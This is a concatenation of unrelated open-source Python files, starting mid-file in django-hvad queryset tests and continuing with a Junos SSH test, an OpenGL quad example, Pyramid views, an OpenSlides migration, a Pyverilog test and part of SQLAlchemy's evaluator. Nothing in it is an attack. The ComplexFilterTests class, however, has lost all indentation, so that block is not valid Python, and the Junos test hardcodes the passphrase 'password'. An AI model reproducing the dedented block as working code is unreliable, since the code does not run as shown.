        values = Normal.objects.language('en').values('shared_field')
        values_list = list(values)
        check = [
            {'shared_field': NORMAL[1].shared_field},
            {'shared_field': NORMAL[2].shared_field},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_translated(self):
        values = Normal.objects.language('en').values('translated_field')
        values_list = list(values)
        check = [
            {'translated_field': NORMAL[1].translated_field['en']},
            {'translated_field': NORMAL[2].translated_field['en']},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_mixed(self):
        values = Normal.objects.language('en').values('translated_field', 'shared_field')
        values_list = list(values)
        check = [
            {'translated_field': NORMAL[1].translated_field['en'],
             'shared_field': NORMAL[1].shared_field},
            {'translated_field': NORMAL[2].translated_field['en'],
             'shared_field': NORMAL[2].shared_field},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_post_language(self):
        # language() may be applied after values() with the same result.
        values = Normal.objects.language().values('shared_field').language('en')
        values_list = list(values)
        check = [
            {'shared_field': NORMAL[1].shared_field},
            {'shared_field': NORMAL[2].shared_field},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_post_filter(self):
        # filter() may be applied after values().
        qs = Normal.objects.language('en').values('shared_field')
        values = qs.filter(shared_field=NORMAL[1].shared_field)
        values_list = list(values)
        check = [
            {'shared_field': NORMAL[1].shared_field},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_deferred_language(self):
        with translation.override('ja'):
            qs = Normal.objects.language()
        with translation.override('en'):
            values = qs.values('translated_field')
            values_list = list(values)
        check = [
            {'translated_field': NORMAL[1].translated_field['en']},
            {'translated_field': NORMAL[2].translated_field['en']},
        ]
        self.assertCountEqual(values_list, check)
    def test_values_language_all(self):
        values = (Normal.objects.language('all').filter(shared_field=NORMAL[1].shared_field)
                  .values('shared_field', 'translated_field'))
        values_list = list(values)
        check = [
            {'shared_field': NORMAL[1].shared_field,
             'translated_field': NORMAL[1].translated_field['ja']},
            {'shared_field': NORMAL[1].shared_field,
             'translated_field': NORMAL[1].translated_field['en']},
        ]
        self.assertCountEqual(values_list, check)
class InBulkTests(HvadTestCase, NormalFixture):
    """``in_bulk()`` with languages, fallbacks and untranslated managers."""
    normal_count = 2
    def test_empty_in_bulk(self):
        # An empty id list must short-circuit without touching the DB.
        with self.assertNumQueries(0):
            result = Normal.objects.language('en').in_bulk([])
        self.assertEqual(len(result), 0)
    def test_in_bulk(self):
        pk1, pk2 = self.normal_id[1], self.normal_id[2]
        with self.assertNumQueries(1):
            result = Normal.objects.language('en').in_bulk([pk1, pk2])
        self.assertCountEqual((pk1, pk2), result)
        self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
        self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
        self.assertEqual(result[pk1].language_code, 'en')
        self.assertEqual(result[pk2].shared_field, NORMAL[2].shared_field)
        self.assertEqual(result[pk2].translated_field, NORMAL[2].translated_field['en'])
        self.assertEqual(result[pk2].language_code, 'en')
    def test_untranslated_in_bulk(self):
        pk1 = self.normal_id[1]
        with translation.override('ja'):
            # One query for the shared rows, one for the translations.
            with self.assertNumQueries(2):
                result = Normal.objects.untranslated().in_bulk([pk1])
            self.assertCountEqual((pk1,), result)
            self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
            self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['ja'])
            self.assertEqual(result[pk1].language_code, 'ja')
    def test_fallbacks_in_bulk(self):
        # Drop object 2's English translation; it must come back as Japanese.
        (Normal.objects.language('en')
            .filter(shared_field=NORMAL[2].shared_field)
            .delete_translations())
        with self.assertNumQueries(1):
            pk1, pk2 = self.normal_id[1], self.normal_id[2]
            result = Normal.objects.language('en').fallbacks('de', 'ja').in_bulk([pk1, pk2])
        self.assertCountEqual((pk1, pk2), result)
        self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
        self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
        self.assertEqual(result[pk1].language_code, 'en')
        self.assertEqual(result[pk2].shared_field, NORMAL[2].shared_field)
        self.assertEqual(result[pk2].translated_field, NORMAL[2].translated_field['ja'])
        self.assertEqual(result[pk2].language_code, 'ja')
    def test_all_languages_in_bulk(self):
        # 'all' is ambiguous for a pk-keyed dict and must be rejected.
        with self.assertRaises(ValueError):
            Normal.objects.language('all').in_bulk([self.normal_id[1]])
    def test_in_bulk_deferred_language(self):
        pk1 = self.normal_id[1]
        with translation.override('ja'):
            qs = Normal.objects.language()
        with translation.override('en'):
            result = qs.in_bulk([pk1])
        self.assertCountEqual((pk1,), result)
        self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
        self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
        self.assertEqual(result[pk1].language_code, 'en')
class DeleteTests(HvadTestCase, NormalFixture):
    """Deleting objects and individual translations.

    Fixture ships 2 objects x 2 languages = 4 translation rows.
    """
    normal_count = 2
    def test_delete_all(self):
        # Deleting shared instances must cascade to their translations.
        Normal.objects.all().delete()
        self.assertEqual(Normal.objects.count(), 0)
        self.assertEqual(Normal._meta.translations_model.objects.count(), 0)
    def test_delete_translation(self):
        self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
        # delete_translations() removes only translation rows, never the
        # shared instances.
        Normal.objects.language('en').delete_translations()
        self.assertEqual(Normal.objects.untranslated().count(), 2)
        self.assertEqual(Normal._meta.translations_model.objects.count(), 2)
        Normal.objects.language('ja').delete_translations()
        self.assertEqual(Normal.objects.untranslated().count(), 2)
        self.assertEqual(Normal._meta.translations_model.objects.count(), 0)
    def test_filtered_delete_translation(self):
        self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
        (Normal.objects.language('en')
            .filter(shared_field=NORMAL[1].shared_field)
            .delete_translations())
        self.assertEqual(Normal.objects.untranslated().count(), 2)
        self.assertEqual(Normal._meta.translations_model.objects.count(), 3)
        (Normal.objects.language('ja')
            .filter(translated_field=NORMAL[2].translated_field['ja'])
            .delete_translations())
        self.assertEqual(Normal.objects.untranslated().count(), 2)
        self.assertEqual(Normal._meta.translations_model.objects.count(), 2)
    def test_delete_translation_deferred_language(self):
        self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
        # The language active when delete_translations() runs is the one used.
        with translation.override('ja'):
            qs = Normal.objects.language()
        with translation.override('en'):
            qs.delete_translations()
        self.assertEqual(Normal.objects.language('ja').count(), 2)
        self.assertEqual(Normal.objects.language('en').count(), 0)
    def test_delete_fallbacks(self):
        qs = Normal.objects.language().fallbacks()
        qs.filter(shared_field=NORMAL[1].shared_field).delete()
        self.assertEqual(Normal.objects.language('ja').count(), self.normal_count - 1)
        self.assertEqual(Normal.objects.language('en').count(), self.normal_count - 1)
class GetTranslationFromInstanceTests(HvadTestCase, NormalFixture):
    """Accessing another language's translation via ``translations.get_language``."""
    normal_count = 1
    def test_simple(self):
        en = Normal.objects.language('en').get()
        ja_trans = en.translations.get_language('ja')
        ja = Normal.objects.language('ja').get(pk=en.pk)
        self.assertEqual(en.shared_field, NORMAL[1].shared_field)
        self.assertEqual(en.translated_field, NORMAL[1].translated_field['en'])
        # A bare translation row carries no shared fields.
        self.assertRaises(AttributeError, getattr, ja_trans, 'shared_field')
        self.assertEqual(ja_trans.translated_field, NORMAL[1].translated_field['ja'])
        self.assertEqual(ja.shared_field, NORMAL[1].shared_field)
        self.assertEqual(ja.translated_field, NORMAL[1].translated_field['ja'])
    def test_cached(self):
        en = Normal.objects.untranslated().prefetch_related('translations').get()
        # Prefetched translations must be served without extra queries.
        with self.assertNumQueries(0):
            ja_trans = en.translations.get_language('ja')
        ja = Normal.objects.language('ja').get(pk=en.pk)
        self.assertEqual(en.shared_field, NORMAL[1].shared_field)
        self.assertEqual(en.translated_field, NORMAL[1].translated_field['en'])
        self.assertRaises(AttributeError, getattr, ja_trans, 'shared_field')
        self.assertEqual(ja_trans.translated_field, NORMAL[1].translated_field['ja'])
        self.assertEqual(ja.shared_field, NORMAL[1].shared_field)
        self.assertEqual(ja.translated_field, NORMAL[1].translated_field['ja'])
    def test_not_exist(self):
        # Missing languages raise DoesNotExist, with or without prefetch.
        en = Normal.objects.untranslated().get()
        with self.assertRaises(Normal.DoesNotExist):
            en.translations.get_language('tt')
        en = Normal.objects.untranslated().prefetch_related('translations').get()
        with self.assertRaises(Normal.DoesNotExist):
            en.translations.get_language('tt')
class AggregateTests(HvadTestCase):
    """``aggregate()`` over shared and translated numeric fields."""
    def test_aggregate(self):
        from django.db.models import Avg
        AggregateModel.objects.language("en").create(number=10, translated_number=20)
        AggregateModel.objects.language("en").create(number=0, translated_number=0)
        # Both implicit and aliased aggregates must work on both field kinds.
        self.assertEqual(AggregateModel.objects.language("en").aggregate(Avg("number")), {'number__avg': 5})
        self.assertEqual(AggregateModel.objects.language("en").aggregate(Avg("translated_number")), {'translated_number__avg': 10})
        self.assertEqual(AggregateModel.objects.language("en").aggregate(num=Avg("number")), {'num': 5})
        self.assertEqual(AggregateModel.objects.language("en").aggregate(tnum=Avg("translated_number")), {'tnum': 10})
class AnnotateTests(HvadTestCase, StandardFixture, NormalFixture):
    """``annotate()`` on translation-aware querysets."""
    normal_count = 2
    standard_count = 4
    def test_annotate(self):
        qs = Normal.objects.language('en').annotate(Count('standards'))
        self.assertEqual(len(qs), self.normal_count)
        self.assertEqual(qs[0].standards__count, 2)
        self.assertEqual(qs[1].standards__count, 2)
        qs = Normal.objects.language('en').annotate(foo=Count('standards'))
        self.assertEqual(len(qs), self.normal_count)
        self.assertEqual(qs[0].foo, 2)
        self.assertEqual(qs[1].foo, 2)
        # A keyword alias colliding with the default name must be rejected.
        with self.assertRaises(ValueError):
            qs = Normal.objects.language('en').annotate(Count('standards'), standards__count=Count('standards'))
class NotImplementedTests(HvadTestCase):
    """Queryset methods hvad deliberately refuses to support must raise."""
    def test_notimplemented(self):
        baseqs = SimpleRelated.objects.language('en')
        self.assertRaises(NotImplementedError, baseqs.defer, 'shared_field')
        self.assertRaises(NotImplementedError, baseqs.only)
        self.assertRaises(NotImplementedError, baseqs.bulk_create, [])
        self.assertRaises(NotImplementedError, baseqs.select_related)
        # update_or_create only exists on Django >= 1.7.
        if django.VERSION >= (1, 7):
            self.assertRaises(NotImplementedError, baseqs.update_or_create)
class MinimumVersionTests(HvadTestCase):
    """Methods from newer Django versions must be absent on older ones."""
    def test_versions(self):
        qs = SimpleRelated.objects.language('en')
        if django.VERSION < (1, 7):
            self.assertRaises(AttributeError, getattr, qs, 'update_or_create')
class ExcludeTests(HvadTestCase, NormalFixture):
    """``exclude()`` on translated fields, fallbacks and the 'all' language."""
    normal_count = 1
    # NOTE(review): this method exercises exclude(), not defer(); the name
    # looks like a copy-paste slip. Renaming would change test discovery,
    # so it is only flagged here.
    def test_defer(self):
        qs = Normal.objects.language('en').exclude(translated_field=NORMAL[1].translated_field['en'])
        self.assertEqual(qs.count(), 0)
    def test_fallbacks_exclude(self):
        (Normal.objects.language('en')
            .filter(shared_field=NORMAL[1].shared_field)
            .delete_translations())
        qs = (Normal.objects.language('en')
              .fallbacks('de', 'ja')
              .exclude(shared_field=NORMAL[1].shared_field))
        self.assertEqual(qs.count(), 0)
    def test_all_languages_exclude(self):
        # Excluding the English text must leave only the Japanese translation.
        qs = Normal.objects.language('all').exclude(translated_field=NORMAL[1].translated_field['en'])
        self.assertEqual(qs.count(), 1)
        self.assertEqual(qs[0].translated_field, NORMAL[1].translated_field['ja'])
    def test_invalid_all_languages_exclude(self):
        with self.assertRaises(ValueError):
            Normal.objects.language().exclude(language_code='all')
class ComplexFilterTests(HvadTestCase, StandardFixture, NormalFixture):
normal_count = 2
standard_count = 2
def test_qobject_filter(self):
shared_contains_one = Q(shared_field__contains='1')
shared_contains_two = Q(shared_field__contains='2')
qs = Normal.objects.language('en').filter(shared_contains_two)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj.translated_field, NORMAL[2].translated_field['en'])
qs = (Normal.objects.language('ja').filter(Q(shared_contains_one | shared_contains_two))
.order_by('shared_field'))
self.assertEqual(qs.count(), 2)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj.translated_field, NORMAL[1].translated_field['ja'])
obj = qs[1]
self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj.translated_field, NORMAL[2].translated_field['ja'])
def test_aware_qobject_filter(self):
from hvad.utils import get_translation_aware_manager
manager = get_translation_aware_manager(Standard)
normal_one = Q(normal_field=STANDARD[1].normal_field)
normal_two = Q(normal_field=STANDARD[2].normal_field)
shared_one = Q(normal__shared_field=NORMAL[STANDARD[1].normal].shared_field)
translated_one_en = Q(normal__translated_field=NORMAL[STANDARD[1].normal].translated_field['en'])
translated_two_en = Q(normal__translated_field=NORMAL[STANDARD[2].normal].translated_field['en'])
with translation.override('en'):
qs = manager.filter(shared_one)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(translated_one_en)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(Q(normal_one & shared_one & translated_one_en))
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(Q(normal_one & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(shared_one & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(translated_one_en & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(normal_one | translated_one_en))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(shared_one | translated_one_en))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(normal_one | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(shared_one | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(translated_one_en | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(normal_one & (translated_one_en | translated_two_en)))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(normal_two & (translated_one_en | translated_two_en)))
self.assertEqual(qs.count(), 1)
qs = manager.filter(shared_one & ~translated_one_en)
self.assertEqual(qs.count(), 0)
qs = manager.filter(shared_one & ~translated_two_en)
self.assertEqual(qs.count(), 1)
def test_defer(self):
    # NOTE(review): despite its name this test exercises complex_filter(),
    # not deferred loading -- consider renaming; confirm against the suite.
    qs = Normal.objects.language('en').complex_filter({})
    self.assertEqual(qs.count(), self.normal_count)
    # complex_filter() with a Q object is expected to be unsupported here.
    self.assertRaises(NotImplementedError,
                      Normal.objects.language('en').complex_filter,
                      Q(shared_field=NORMAL[1].shared_field))
|
data/Juniper/py-junos-eznc/tests/functional/test_device_ssh.py
|
'''
@author: rsherman
'''
import unittest
from nose.plugins.attrib import attr
from jnpr.junos import Device
@attr('functional')
class TestDeviceSsh(unittest.TestCase):
    """Functional SSH-connection tests against a live Junos device.

    These tests open real network connections; they require reachability of
    the host below and valid SSH credentials/keys on the test runner.
    """

    def tearDown(self):
        # Close whichever Device the test just opened.
        self.dev.close()

    def test_device_open_default_key(self):
        # Connect using the invoking user's default SSH key.
        self.dev = Device('pabst.englab.juniper.net')
        self.dev.open()
        self.assertEqual(self.dev.connected, True)

    def test_device_open_key_pass(self):
        # Connect using an explicit, passphrase-protected private key file.
        self.dev = Device(host='pabst.englab.juniper.net', ssh_private_key_file='/var/lib/jenkins/.ssh/passkey', passwd='password')
        self.dev.open()
        self.assertEqual(self.dev.connected, True)
|
data/adamlwgriffiths/PyGLy/pygly/examples/renderable_textured_quad.py
|
import textwrap
import numpy
from OpenGL import GL
from pygly.shader import Shader, VertexShader, FragmentShader, ShaderProgram
from pygly.vertex_buffer import VertexBuffer, BufferAttributes, GenericAttribute, VertexAttribute, TextureCoordAttribute
from pygly.vertex_array import VertexArray
from pyrr import geometry
# Build a 5x5-unit quad with ST texture coordinates as float32 data.
vertices, indices = geometry.create_quad(scale=(5.0,5.0), st=True, dtype='float32')
# Expand the indexed vertices into a flat triangle list so the quad can be
# drawn with glDrawArrays (no index buffer required).
vertices = vertices[indices]
# Re-interpret the flat floats as structured records:
# 3 position floats followed by 2 texture-coordinate floats per vertex.
vertices.dtype = [
    ('position', 'float32', (3,)),
    ('texture_coord', 'float32', (2,)),
]
def create(core_profile=True):
    """Instantiate the quad renderable matching the requested GL profile."""
    return CoreQuad() if core_profile else LegacyQuad()
class CoreQuad( object ):
    """Textured quad renderable for core-profile OpenGL (shaders + VBO + VAO)."""

    # Vertex shader: applies projection and model-view transforms and passes
    # the per-vertex UV on to the fragment stage.
    vertex_shader = textwrap.dedent( """
        // input
        in vec3 in_position;
        in vec2 in_uv;
        uniform mat4 model_view;
        uniform mat4 projection;
        // shared
        out vec2 ex_uv;
        void main(void)
        {
            // apply projection and model view matrix to vertex
            gl_Position = projection * model_view * vec4( in_position, 1.0 );
            ex_uv = in_uv;
        }
        """ )

    # Fragment shader: samples the bound diffuse texture at the interpolated UV.
    fragment_shader = textwrap.dedent( """
        // shared
        in vec2 ex_uv;
        uniform sampler2D in_diffuse_texture;
        // output
        out vec4 fragColor;
        void main(void)
        {
            // set colour of each fragment
            fragColor = texture( in_diffuse_texture, ex_uv );
        }
        """ )

    def __init__( self ):
        super( CoreQuad, self ).__init__()
        global vertices
        # Compile and link the shader pair.
        self.shader = ShaderProgram(
            VertexShader( self.vertex_shader ),
            FragmentShader( self.fragment_shader )
        )
        # Upload the module-level vertex data into a static VBO.
        self.buffer = VertexBuffer(
            GL.GL_ARRAY_BUFFER,
            GL.GL_STATIC_DRAW,
            data = vertices,
        )
        # Map the structured-array fields onto the shader's vertex attributes.
        self.buffer_attributes = BufferAttributes()
        self.buffer_attributes[ 'position' ] = GenericAttribute.from_dtype(
            self.buffer,
            vertices.dtype,
            'position',
            location = self.shader.attributes[ 'in_position' ]
        )
        self.buffer_attributes[ 'uv' ] = GenericAttribute.from_dtype(
            self.buffer,
            vertices.dtype,
            'texture_coord',
            location = self.shader.attributes[ 'in_uv' ]
        )
        # Record the attribute bindings in a VAO so draw() is a single bind.
        self.vao = VertexArray()
        self.vao.bind()
        self.buffer.bind()
        self.buffer_attributes.set()
        self.buffer.unbind()
        self.vao.unbind()

    def draw( self, projection, model_view ):
        # Draw the quad; the diffuse texture is expected on texture unit 0.
        global vertices
        self.shader.bind()
        self.shader.uniforms[ 'projection' ].value = projection
        self.shader.uniforms[ 'model_view' ].value = model_view
        self.shader.uniforms[ 'in_diffuse_texture' ].value = 0
        self.vao.bind()
        GL.glDrawArrays( GL.GL_TRIANGLES, 0, len( vertices ) )
        self.vao.unbind()
        self.shader.unbind()
class LegacyQuad( object ):
    """Textured quad renderable for legacy (fixed-function pipeline) OpenGL.

    NOTE(review): draw() here takes no matrices, unlike CoreQuad.draw() --
    the fixed-function matrix stacks supply them; confirm callers handle
    the differing signatures.
    """

    # Vertex shader using the legacy built-in matrix stacks and texcoords.
    vertex_shader = textwrap.dedent( """
        void main(void)
        {
            // apply projection and model view matrix to vertex
            gl_Position = gl_ProjectionMatrix * gl_ModelViewMatrix * gl_Vertex;
            // select the texture coordinate to use
            gl_TexCoord[0] = gl_MultiTexCoord0;
        }
        """ )

    # Fragment shader: samples the diffuse texture at the legacy texcoord.
    fragment_shader = textwrap.dedent( """
        // input
        uniform sampler2D in_diffuse_texture;
        void main(void)
        {
            // set colour of each fragment
            gl_FragColor = texture2D( in_diffuse_texture, gl_TexCoord[0].st );
        }
        """ )

    def __init__( self ):
        super( LegacyQuad, self ).__init__()
        global vertices
        # When False, draw() skips shader binding and uses pure fixed function.
        self.use_shaders = True
        GL.glEnable(GL.GL_TEXTURE_2D)
        self.shader = ShaderProgram(
            VertexShader( self.vertex_shader ),
            FragmentShader( self.fragment_shader )
        )
        self.buffer = VertexBuffer(
            GL.GL_ARRAY_BUFFER,
            GL.GL_STATIC_DRAW,
            data = vertices,
        )
        # Legacy attribute bindings (glVertexPointer / glTexCoordPointer style).
        self.buffer_attributes = BufferAttributes()
        self.buffer_attributes[ 'position' ] = VertexAttribute.from_dtype(
            self.buffer,
            vertices.dtype,
            'position'
        )
        self.buffer_attributes[ 'uv' ] = TextureCoordAttribute.from_dtype(
            self.buffer,
            vertices.dtype,
            'texture_coord'
        )

    def draw( self ):
        # Bind attributes per draw call (no VAO in the legacy path).
        global vertices
        if self.use_shaders:
            self.shader.bind()
            self.shader.uniforms[ 'in_diffuse_texture' ].value = 0
        self.buffer_attributes.push_attributes()
        self.buffer.bind()
        self.buffer_attributes.set()
        self.buffer.unbind()
        GL.glDrawArrays( GL.GL_TRIANGLES, 0, len( vertices ) )
        self.buffer_attributes.pop_attributes()
        if self.use_shaders:
            self.shader.unbind()
|
data/Pylons/virginia/virginia/views.py
|
import os
import mimetypes
# Register extensions this app serves: structured text (.stx) is rendered as
# HTML, and .pdf is pinned to application/pdf regardless of platform tables.
mimetypes.add_type('text/html', '.stx')
mimetypes.add_type('application/pdf', '.pdf')
from zope.structuredtext import stx2html
from pyramid.response import Response
from pyramid.httpexceptions import HTTPFound
from pyramid.view import render_view_to_response
from pyramid.view import view_config
from virginia.models import File
from virginia.models import Directory
@view_config(context=File)
def file_view(context, request):
    """Dispatch a File to the view registered for its filename extension.

    The extension (e.g. '.stx', '.html') is used as the view *name*, so
    the matching extension-specific view below renders the response.
    """
    # os.path.splitext only inspects the final path component, so splitting
    # off the directory first (as the old code did) is unnecessary; the
    # unused `dirname`/`name` locals are gone.
    ext = os.path.splitext(context.path)[1]
    return render_view_to_response(context, request, ext)
@view_config(context=Directory)
def directory_view(context, request):
    """Render a directory: redirect to the trailing-slash URL, serve the
    first available index file, or fall back to a plain-text notice."""
    path_info = request.environ['PATH_INFO']
    if not path_info.endswith('/'):
        # Canonicalise directory URLs to the trailing-slash form.
        return HTTPFound(location=path_info + '/')
    for candidate in ('index.html', 'index.stx', 'index.pt'):
        try:
            default = context[candidate]
        except KeyError:
            continue
        return file_view(default, request)
    fallback = Response('No default view for %s' % context.path)
    fallback.content_type = 'text/plain'
    return fallback
@view_config(context=File, name='.stx')
def structured_text_view(context, request):
    """ Filesystem-based STX view

    Converts the file's structured-text source to HTML and serves it.
    """
    result = stx2html(context.source)
    response = Response(result)
    response.content_type = 'text/html'
    return response
@view_config(context=File, name='.html')
@view_config(context=File, name='.pdf')
@view_config(context=File, name='.txt')
@view_config(context=File, name='.jpg')
def raw_view(context, request):
    """ Just return the source raw.

    The Content-Type is guessed from the filename; unknown extensions
    fall back to text/plain.
    """
    response = Response(context.source)
    # The old code split the path and re-split the extension into unused
    # locals; guess_type needs only the basename.
    filename = os.path.basename(context.path)
    content_type, _encoding = mimetypes.guess_type(filename)
    response.content_type = content_type or 'text/plain'
    return response
|
data/OpenSlides/OpenSlides/openslides/users/migrations/0001_initial.py
|
from __future__ import unicode_literals
from django.db import migrations, models
import openslides.utils.models
class Migration(migrations.Migration):
    """Initial users-app migration: creates the custom ``User`` model."""

    initial = True

    dependencies = [
        # Needs auth's Group/Permission models in their post-contenttypes state.
        ('auth', '0006_require_contenttypes_0002'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(
                    default=False,
                    help_text='Designates that this user has all permissions without explicitly assigning them.',
                    verbose_name='superuser status')),
                ('username', models.CharField(blank=True, max_length=255, unique=True)),
                ('first_name', models.CharField(blank=True, max_length=255)),
                ('last_name', models.CharField(blank=True, max_length=255)),
                # OpenSlides-specific profile fields.
                ('structure_level', models.CharField(blank=True, default='', max_length=255)),
                ('title', models.CharField(blank=True, default='', max_length=50)),
                ('about_me', models.TextField(blank=True, default='')),
                ('comment', models.TextField(blank=True, default='')),
                ('default_password', models.CharField(blank=True, default='', max_length=100)),
                ('is_active', models.BooleanField(default=True)),
                ('is_present', models.BooleanField(default=False)),
                ('groups', models.ManyToManyField(
                    blank=True,
                    help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
                    related_name='user_set',
                    related_query_name='user',
                    to='auth.Group',
                    verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(
                    blank=True,
                    help_text='Specific permissions for this user.',
                    related_name='user_set',
                    related_query_name='user',
                    to='auth.Permission',
                    verbose_name='user permissions')),
            ],
            options={
                # Custom app-level permissions; Django's default add/change/
                # delete permissions are disabled below.
                'permissions': (
                    ('can_see_name', 'Can see names of users'),
                    ('can_see_extra_data', 'Can see extra data of users (e.g. present and comment)'),
                    ('can_manage', 'Can manage users')),
                'default_permissions': (),
                'ordering': ('last_name', 'first_name', 'username'),
            },
            bases=(openslides.utils.models.RESTModelMixin, models.Model),
        ),
    ]
|
data/PyHDI/Pyverilog/tests/dataflow_test/test_dat_case_in_func.py
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from pyverilog.dataflow.dataflow_analyzer import VerilogDataflowAnalyzer
from pyverilog.dataflow.optimizer import VerilogDataflowOptimizer
from pyverilog.controlflow.controlflow_analyzer import VerilogControlflowAnalyzer
# Directory holding the Verilog sources used by the dataflow tests
# (three levels up from this file, then verilogcode/).
codedir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + '/verilogcode/'

# Expected resolved-dataflow dump for case_in_func.v, one "<name>: <expr>"
# line per term, sorted by name.  Compared verbatim in test().
expected = """\
TOP.IN1: TOP_IN1
TOP.SEL: TOP_SEL
TOP.bit: (((TOP_SEL=='d0))? TOP_IN1 : 1'd0)
TOP.md_always0.al_block0.al_functioncall0._rn0_func1: TOP_IN1
TOP.md_always0.al_block0.al_functioncall0._rn1_func1: 1'd0
TOP.md_always0.al_block0.al_functioncall0.func1: (((TOP_SEL=='d0))? TOP_IN1 : 1'd0)
TOP.md_always0.al_block0.al_functioncall0.in1: TOP_IN1
TOP.md_always0.al_block0.al_functioncall0.sel: TOP_SEL
"""
def test():
    """Analyze case_in_func.v and compare the resolved dataflow dump against
    the module-level ``expected`` text."""
    filelist = [codedir + 'case_in_func.v']
    topmodule = 'TOP'
    noreorder = False
    nobind = False
    include = None
    define = None

    # Parse the design and build the term/bind dataflow information.
    analyzer = VerilogDataflowAnalyzer(filelist, topmodule,
                                       noreorder=noreorder,
                                       nobind=nobind,
                                       preprocess_include=include,
                                       preprocess_define=define)
    analyzer.generate()

    directives = analyzer.get_directives()
    instances = analyzer.getInstances()
    terms = analyzer.getTerms()
    binddict = analyzer.getBinddict()

    # Constant-fold the dataflow before control-flow analysis.
    optimizer = VerilogDataflowOptimizer(terms, binddict)
    optimizer.resolveConstant()

    c_analyzer = VerilogControlflowAnalyzer(topmodule, terms,
                                            binddict,
                                            resolved_terms=optimizer.getResolvedTerms(),
                                            resolved_binddict=optimizer.getResolvedBinddict(),
                                            constlist=optimizer.getConstlist()
                                            )

    # Render each resolved term as "<name>: <expression>", sorted by name.
    output = []
    for tk in sorted(c_analyzer.resolved_terms.keys(), key=lambda x:str(x)):
        tree = c_analyzer.makeTree(tk)
        output.append(str(tk) + ': ' + tree.tocode())
    rslt = '\n'.join(output) + '\n'

    print(rslt)
    assert(expected == rslt)
# Allow running this test directly as a script.
if __name__ == '__main__':
    test()
|
data/Net-ng/kansha/kansha/title/__init__.py
|
from .comp import EditableTitle
from .import view
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/sqlalchemy/orm/evaluator.py
|
import operator
from ..sql import operators
from .. import util
class UnevaluatableError(Exception):
    """Raised when a SQL clause cannot be evaluated in plain Python."""
    pass
# Operators that can be applied directly to Python operand values.
_straight_ops = set(getattr(operators, op)
                    for op in ('add', 'mul', 'sub',
                               'div',
                               'mod', 'truediv',
                               'lt', 'le', 'ne', 'gt', 'ge', 'eq'))

# SQL operators with no straightforward in-Python equivalent; evaluation
# of clauses using these raises UnevaluatableError.
_notimplemented_ops = set(getattr(operators, op)
                          for op in ('like_op', 'notlike_op', 'ilike_op',
                                     'notilike_op', 'between_op', 'in_op',
                                     'notin_op', 'endswith_op', 'concat_op'))
class EvaluatorCompiler(object):
    """Compile SQL expression clauses into plain-Python evaluator callables.

    Each ``visit_*`` method returns a function of one argument (a mapped
    object) that produces the clause's value.  SQL three-valued logic is
    emulated: ``None`` stands for NULL and propagates through comparisons
    and boolean combinations.
    """

    def __init__(self, target_cls=None):
        # Optional mapped class the criteria are expected to apply to; used
        # only to warn about cross-class evaluation in visit_column().
        self.target_cls = target_cls

    def process(self, clause):
        """Dispatch on ``clause.__visit_name__`` to the matching visit_* method.

        Raises UnevaluatableError for clause types with no visitor.
        """
        meth = getattr(self, "visit_%s" % clause.__visit_name__, None)
        if not meth:
            raise UnevaluatableError(
                "Cannot evaluate %s" % type(clause).__name__)
        return meth(clause)

    def visit_grouping(self, clause):
        # Parentheses have no effect on evaluation; unwrap the inner element.
        return self.process(clause.element)

    def visit_null(self, clause):
        return lambda obj: None

    def visit_false(self, clause):
        return lambda obj: False

    def visit_true(self, clause):
        return lambda obj: True

    def visit_column(self, clause):
        """Return a getter for the mapped attribute the column corresponds to."""
        if 'parentmapper' in clause._annotations:
            parentmapper = clause._annotations['parentmapper']
            if self.target_cls and not issubclass(
                    self.target_cls, parentmapper.class_):
                util.warn(
                    "Can't do in-Python evaluation of criteria against "
                    "alternate class %s; "
                    "expiration of objects will not be accurate "
                    "and/or may fail. synchronize_session should be set to "
                    "False or 'fetch'. "
                    "This warning will be an exception "
                    "in 1.0." % parentmapper.class_
                )
            # Translate the column to the mapped attribute name.
